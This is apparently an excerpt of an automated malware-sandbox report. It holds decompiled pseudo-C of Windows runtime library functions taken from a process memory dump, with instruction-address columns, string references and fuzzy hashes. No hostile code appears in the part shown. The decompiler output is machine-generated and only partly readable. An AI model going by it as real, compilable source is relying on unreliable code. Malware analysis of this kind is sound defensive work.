				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0108EEF0(0x1167b60);
					_t134 =  *0x1167b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1167b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1167b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01086D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E010876E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01118938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0107B150();
													}
													_t116 = E01116D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E010875CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1168638; // 0x0
																	_t122 = L010838A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E010876E2(_t154);
																			goto L41;
																		}
																	} else {
																		E010876E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L010AFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L010870F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E010AFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E010AFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E010AFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E010AFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E010AFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1167b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1167b84 = _t75;
						_t73 = E0108EB70(_t134, 0x1167b60);
						if( *0x1167b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0108FF60( *0x1167b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                            0x010afab0
                                                                            0x010afab2
                                                                            0x010afab3
                                                                            0x010afab4
                                                                            0x010afabc
                                                                            0x010afac0
                                                                            0x010afb14
                                                                            0x010afb17
                                                                            0x010afac2
                                                                            0x010afac8
                                                                            0x010afacd
                                                                            0x010afad3
                                                                            0x010afad3
                                                                            0x010afadd
                                                                            0x010afb18
                                                                            0x010afb1b
                                                                            0x010afb1d
                                                                            0x010afb1e
                                                                            0x010afb1f
                                                                            0x010afb20
                                                                            0x010afb21
                                                                            0x010afb22
                                                                            0x010afb23
                                                                            0x010afb24
                                                                            0x010afb25
                                                                            0x010afb26
                                                                            0x010afb27
                                                                            0x010afb28
                                                                            0x010afb29
                                                                            0x010afb2a
                                                                            0x010afb2b
                                                                            0x010afb2c
                                                                            0x010afb2d
                                                                            0x010afb2e
                                                                            0x010afb2f
                                                                            0x010afb3a
                                                                            0x010afb3b
                                                                            0x010afb3e
                                                                            0x010afb41
                                                                            0x010afb44
                                                                            0x010afb47
                                                                            0x010afb4a
                                                                            0x010afb4d
                                                                            0x010afb53
                                                                            0x010ebdcb
                                                                            0x010ebdcb
                                                                            0x010afb59
                                                                            0x010afb5b
                                                                            0x010afb5b
                                                                            0x010afb5e
                                                                            0x010ebdd5
                                                                            0x010ebdd8
                                                                            0x00000000
                                                                            0x010ebdda
                                                                            0x00000000
                                                                            0x010ebdda
                                                                            0x010afb64
                                                                            0x010afb64
                                                                            0x010afb64
                                                                            0x010afb67
                                                                            0x010afb6e
                                                                            0x010afb70
                                                                            0x010afb72
                                                                            0x00000000
                                                                            0x010afb78
                                                                            0x010afb7a
                                                                            0x010afb7a
                                                                            0x010afb7d
                                                                            0x010afb80
                                                                            0x010ebddf
                                                                            0x010ebde1
                                                                            0x00000000
                                                                            0x010ebde3
                                                                            0x00000000
                                                                            0x010ebde3
                                                                            0x010afb86
                                                                            0x010afb86
                                                                            0x010afb86
                                                                            0x010afb8b
                                                                            0x010afb90
                                                                            0x010afb92
                                                                            0x010afb94
                                                                            0x010afb9a
                                                                            0x010afb9b
                                                                            0x010afba1
                                                                            0x010ebde8
                                                                            0x010ebdeb
                                                                            0x010ebded
                                                                            0x010ebeb5
                                                                            0x010ebeb5
                                                                            0x010ebebb
                                                                            0x010ebebd
                                                                            0x010ebec3
                                                                            0x010ebed2
                                                                            0x010ebedd
                                                                            0x010ebedd
                                                                            0x010ebeed
                                                                            0x00000000
                                                                            0x010ebdf3
                                                                            0x010ebdfe
                                                                            0x010ebe06
                                                                            0x010ebe0b
                                                                            0x010ebe0d
                                                                            0x010ebe0f
                                                                            0x010ebe14
                                                                            0x010ebe19
                                                                            0x010ebe20
                                                                            0x010ebe25
                                                                            0x010ebe27
                                                                            0x010ebe35
                                                                            0x010ebe39
                                                                            0x010ebe46
                                                                            0x010ebe4f
                                                                            0x010ebe54
                                                                            0x010ebe56
                                                                            0x010ebef8
                                                                            0x010ebef8
                                                                            0x00000000
                                                                            0x010ebe5c
                                                                            0x010ebe5c
                                                                            0x010ebe60
                                                                            0x00000000
                                                                            0x010ebe66
                                                                            0x010ebe66
                                                                            0x010ebe7f
                                                                            0x010ebe84
                                                                            0x010ebe87
                                                                            0x010ebe89
                                                                            0x010ebe8b
                                                                            0x010ebe99
                                                                            0x010ebe9d
                                                                            0x010ebea0
                                                                            0x010ebeac
                                                                            0x010ebeaf
                                                                            0x010ebeb1
                                                                            0x010ebeb3
                                                                            0x010ebeb3
                                                                            0x00000000
                                                                            0x010ebea2
                                                                            0x010ebea2
                                                                            0x00000000
                                                                            0x010ebea2
                                                                            0x010ebe8d
                                                                            0x010ebe8d
                                                                            0x010ebe92
                                                                            0x00000000
                                                                            0x010ebe92
                                                                            0x010ebe8b
                                                                            0x010ebe60
                                                                            0x010ebe3b
                                                                            0x010ebe3b
                                                                            0x010ebe3e
                                                                            0x00000000
                                                                            0x010ebe40
                                                                            0x010ebe40
                                                                            0x010ebe44
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010ebe44
                                                                            0x010ebe3e
                                                                            0x010ebe29
                                                                            0x010ebe29
                                                                            0x00000000
                                                                            0x010ebe29
                                                                            0x010ebe27
                                                                            0x00000000
                                                                            0x010afba7
                                                                            0x010afba7
                                                                            0x010afbab
                                                                            0x010ebf02
                                                                            0x010afbb1
                                                                            0x010afbb1
                                                                            0x010afbb8
                                                                            0x010afbbd
                                                                            0x010afbbd
                                                                            0x010afbbf
                                                                            0x010afbbf
                                                                            0x010afbc5
                                                                            0x010afbcb
                                                                            0x010afbf8
                                                                            0x010afbf8
                                                                            0x010afbfa
                                                                            0x00000000
                                                                            0x010afc00
                                                                            0x010afc00
                                                                            0x010afc03
                                                                            0x00000000
                                                                            0x010afc09
                                                                            0x010afc09
                                                                            0x010afc0f
                                                                            0x010afc15
                                                                            0x010afc23
                                                                            0x010afc23
                                                                            0x010afc25
                                                                            0x010afc27
                                                                            0x010afc75
                                                                            0x010afc7c
                                                                            0x010afc84
                                                                            0x00000000
                                                                            0x010afc29
                                                                            0x010afc29
                                                                            0x010afc2d
                                                                            0x010afc30
                                                                            0x010ebf0f
                                                                            0x00000000
                                                                            0x010afc36
                                                                            0x010afc38
                                                                            0x010afc3b
                                                                            0x010afc41
                                                                            0x010ebf17
                                                                            0x010ebf19
                                                                            0x010ebf48
                                                                            0x010ebf4b
                                                                            0x00000000
                                                                            0x010ebf1b
                                                                            0x010ebf22
                                                                            0x010ebf24
                                                                            0x010ebf26
                                                                            0x00000000
                                                                            0x010ebf2c
                                                                            0x010ebf37
                                                                            0x010ebf39
                                                                            0x010ebf3b
                                                                            0x00000000
                                                                            0x010ebf41
                                                                            0x010ebf41
                                                                            0x010ebf41
                                                                            0x010ebf41
                                                                            0x010ebf45
                                                                            0x00000000
                                                                            0x010ebf45
                                                                            0x010ebf3b
                                                                            0x010ebf26
                                                                            0x00000000
                                                                            0x010afc47
                                                                            0x010afc47
                                                                            0x010afc49
                                                                            0x010afcb2
                                                                            0x010afcb4
                                                                            0x010afcb6
                                                                            0x010afcdc
                                                                            0x010afcdc
                                                                            0x00000000
                                                                            0x010afcb8
                                                                            0x010afcc3
                                                                            0x010afcc5
                                                                            0x010afcc7
                                                                            0x00000000
                                                                            0x010afcc9
                                                                            0x010afcc9
                                                                            0x010afccd
                                                                            0x00000000
                                                                            0x010afccd
                                                                            0x010afcc7
                                                                            0x00000000
                                                                            0x010afc4b
                                                                            0x010afc4b
                                                                            0x010afc4e
                                                                            0x010afc4e
                                                                            0x010afc51
                                                                            0x010afc51
                                                                            0x010afc54
                                                                            0x010afc5a
                                                                            0x010afc5c
                                                                            0x010afc5f
                                                                            0x010afc61
                                                                            0x010afc63
                                                                            0x010afc65
                                                                            0x010afc67
                                                                            0x010afc6e
                                                                            0x010afc72
                                                                            0x010afc72
                                                                            0x010afc72
                                                                            0x010afc72
                                                                            0x010afc67
                                                                            0x010afc61
                                                                            0x00000000
                                                                            0x010afc5a
                                                                            0x010afc49
                                                                            0x010afc41
                                                                            0x010afc30
                                                                            0x010afc27
                                                                            0x010afc03
                                                                            0x010afbcd
                                                                            0x010afbd3
                                                                            0x010afbd9
                                                                            0x010afbdc
                                                                            0x010afbde
                                                                            0x010afc99
                                                                            0x010afc9b
                                                                            0x010afc9d
                                                                            0x010afcd5
                                                                            0x010afcd5
                                                                            0x010afc89
                                                                            0x010afc89
                                                                            0x00000000
                                                                            0x010afc9f
                                                                            0x010afc9f
                                                                            0x010afca3
                                                                            0x00000000
                                                                            0x010afca3
                                                                            0x00000000
                                                                            0x010afbe4
                                                                            0x010afbe4
                                                                            0x010afbe4
                                                                            0x010afbe4
                                                                            0x010afbe9
                                                                            0x010afbf2
                                                                            0x00000000
                                                                            0x010afbf2
                                                                            0x010afbde
                                                                            0x010afbcb
                                                                            0x010afbab
                                                                            0x010afc8b
                                                                            0x010afc8b
                                                                            0x010afc8c
                                                                            0x010afb80
                                                                            0x010afb72
                                                                            0x010afb5e
                                                                            0x010afc8d
                                                                            0x010afc91
                                                                            0x010afadf
                                                                            0x010afadf
                                                                            0x010afae1
                                                                            0x010afae4
                                                                            0x010afae7
                                                                            0x010afaec
                                                                            0x010afaf8
                                                                            0x010afb00
                                                                            0x010afb07
                                                                            0x010afb0f
                                                                            0x010afb0f
                                                                            0x010afb07
                                                                            0x00000000
                                                                            0x010afaf8
                                                                            0x010afadd

                                                                            Strings
                                                                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 010EBE0F
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                            • API String ID: 0-865735534
                                                                            • Opcode ID: 8ba804fef35678e2056d484464106862e7ab4b461fb84f3bb881a94dbd22a375
                                                                            • Instruction ID: 6c64d08187a3f5ddc4b27fd320720a2ed34af9e80538038e5f364f2b02c54613
                                                                            • Opcode Fuzzy Hash: 8ba804fef35678e2056d484464106862e7ab4b461fb84f3bb881a94dbd22a375
                                                                            • Instruction Fuzzy Hash: C2A10331B0060B8FEB66EBAAC4547BEB7E5AF48710F0445B9D9C6CB681DB30D8418B80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01072D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 63%
                                                                            			E01072D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1165350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1167bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E010B97C0();
				}
				if( *0x11679c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x11679c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E010A1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01097D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0110FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E010B9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E010AE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L010CDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1166901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1166901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E010B9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E010B95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01097D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01097D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E010F7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0110FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1165350;
							if(_t109 != 0x1165350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0110FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01105720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                            0x01072d8a
                                                                            0x01072d8a
                                                                            0x01072d92
                                                                            0x01072d96
                                                                            0x01072d9e
                                                                            0x01072da0
                                                                            0x01072da3
                                                                            0x01072da5
                                                                            0x01072da8
                                                                            0x01072dab
                                                                            0x01072db2
                                                                            0x010cf9aa
                                                                            0x010cf9ab
                                                                            0x010cf9ae
                                                                            0x010cf9ae
                                                                            0x01072db8
                                                                            0x01072dc2
                                                                            0x010cf9b9
                                                                            0x010cf9be
                                                                            0x010cf9bf
                                                                            0x010cf9bf
                                                                            0x01072dcf
                                                                            0x010cf9c9
                                                                            0x01072dd5
                                                                            0x01072dd5
                                                                            0x01072dd5
                                                                            0x01072dde
                                                                            0x01072de1
                                                                            0x01072e70
                                                                            0x01072e72
                                                                            0x01072e72
                                                                            0x01072de7
                                                                            0x01072deb
                                                                            0x01072e7c
                                                                            0x01072e83
                                                                            0x01072e85
                                                                            0x01072e8b
                                                                            0x01072e8d
                                                                            0x01072e92
                                                                            0x01072e92
                                                                            0x01072e85
                                                                            0x01072df1
                                                                            0x01072df7
                                                                            0x01072df9
                                                                            0x01072df9
                                                                            0x01072dfc
                                                                            0x01072dff
                                                                            0x01072e02
                                                                            0x00000000
                                                                            0x01072e05
                                                                            0x01072e0c
                                                                            0x010cf9d9
                                                                            0x01072e12
                                                                            0x01072e12
                                                                            0x01072e12
                                                                            0x01072e1a
                                                                            0x010cf9e3
                                                                            0x010cf9e9
                                                                            0x010cf9f0
                                                                            0x010cf9f6
                                                                            0x010cf9f8
                                                                            0x010cf9f8
                                                                            0x010cf9f0
                                                                            0x01072e23
                                                                            0x010cfa02
                                                                            0x010cfa03
                                                                            0x010cfa05
                                                                            0x010cfa06
                                                                            0x00000000
                                                                            0x01072e29
                                                                            0x01072e29
                                                                            0x01072e2e
                                                                            0x01072e34
                                                                            0x01072e3e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01072e44
                                                                            0x01072e47
                                                                            0x01072e4d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01072e4f
                                                                            0x01072e54
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01072e5a
                                                                            0x01072e5f
                                                                            0x01072e9a
                                                                            0x01072ea4
                                                                            0x01072ea5
                                                                            0x01072ea8
                                                                            0x01072eaf
                                                                            0x01072eb2
                                                                            0x01072eb5
                                                                            0x010cfae9
                                                                            0x010cfaeb
                                                                            0x010cfaed
                                                                            0x010cfaef
                                                                            0x010cfaf7
                                                                            0x010cfaf8
                                                                            0x010cfafd
                                                                            0x010cfaff
                                                                            0x010cfb04
                                                                            0x010cfb04
                                                                            0x010cfaff
                                                                            0x01072ec0
                                                                            0x01072ec4
                                                                            0x01072ec6
                                                                            0x01072ec8
                                                                            0x010cfb14
                                                                            0x010cfb18
                                                                            0x010cfb1e
                                                                            0x010cfb21
                                                                            0x010cfb21
                                                                            0x01072ece
                                                                            0x01072ece
                                                                            0x01072ece
                                                                            0x01072ed7
                                                                            0x01072e61
                                                                            0x01072e63
                                                                            0x010cfa6b
                                                                            0x010cfa71
                                                                            0x010cfa76
                                                                            0x010cfa78
                                                                            0x010cfa8a
                                                                            0x010cfa7a
                                                                            0x010cfa83
                                                                            0x010cfa83
                                                                            0x010cfa8f
                                                                            0x010cfa91
                                                                            0x010cfa97
                                                                            0x010cfa9d
                                                                            0x010cfaa4
                                                                            0x010cfaaa
                                                                            0x010cfaaf
                                                                            0x010cfab1
                                                                            0x010cfac3
                                                                            0x010cfab3
                                                                            0x010cfabc
                                                                            0x010cfabc
                                                                            0x010cfac8
                                                                            0x010cfacb
                                                                            0x010cfadf
                                                                            0x010cfadf
                                                                            0x010cfacb
                                                                            0x010cfaa4
                                                                            0x010cfa91
                                                                            0x01072e6f
                                                                            0x01072e6f
                                                                            0x01072e5f
                                                                            0x010cfa13
                                                                            0x010cfa15
                                                                            0x010cfa17
                                                                            0x010cfa1f
                                                                            0x010cfa21
                                                                            0x010cfa22
                                                                            0x010cfa25
                                                                            0x010cfa28
                                                                            0x010cfa2f
                                                                            0x010cfa2f
                                                                            0x010cfa2a
                                                                            0x010cfa2a
                                                                            0x010cfa2a
                                                                            0x010cfa31
                                                                            0x010cfa34
                                                                            0x010cfa36
                                                                            0x010cfa3c
                                                                            0x010cfa3e
                                                                            0x010cfa41
                                                                            0x010cfa43
                                                                            0x010cfa45
                                                                            0x010cfa45
                                                                            0x010cfa41
                                                                            0x010cfa3c
                                                                            0x010cfa4a
                                                                            0x010cfa4f
                                                                            0x010cfa51
                                                                            0x010cfa53
                                                                            0x010cfa56
                                                                            0x010cfa5b
                                                                            0x010cfa5e
                                                                            0x00000000
                                                                            0x010cfa5e
                                                                            0x01072e23

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Re-Waiting
                                                                            • API String ID: 0-316354757
                                                                            • Opcode ID: 8fe09e023432b08613446f909441b17cc5b7b4dd9917491cde5a0876bfce641c
                                                                            • Instruction ID: 3abf55cf0de669b0858d24fd0b196b87f3c1370d12d415f7b6f597de12592fc6
                                                                            • Opcode Fuzzy Hash: 8fe09e023432b08613446f909441b17cc5b7b4dd9917491cde5a0876bfce641c
                                                                            • Instruction Fuzzy Hash: 6A613671E006069FDB32DB6CC840BBEBBE6EB44B14F1406A9E5D1972C1C7749D41CB96
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01140EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 80%
                                                                            			E01140EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0113FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01141074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
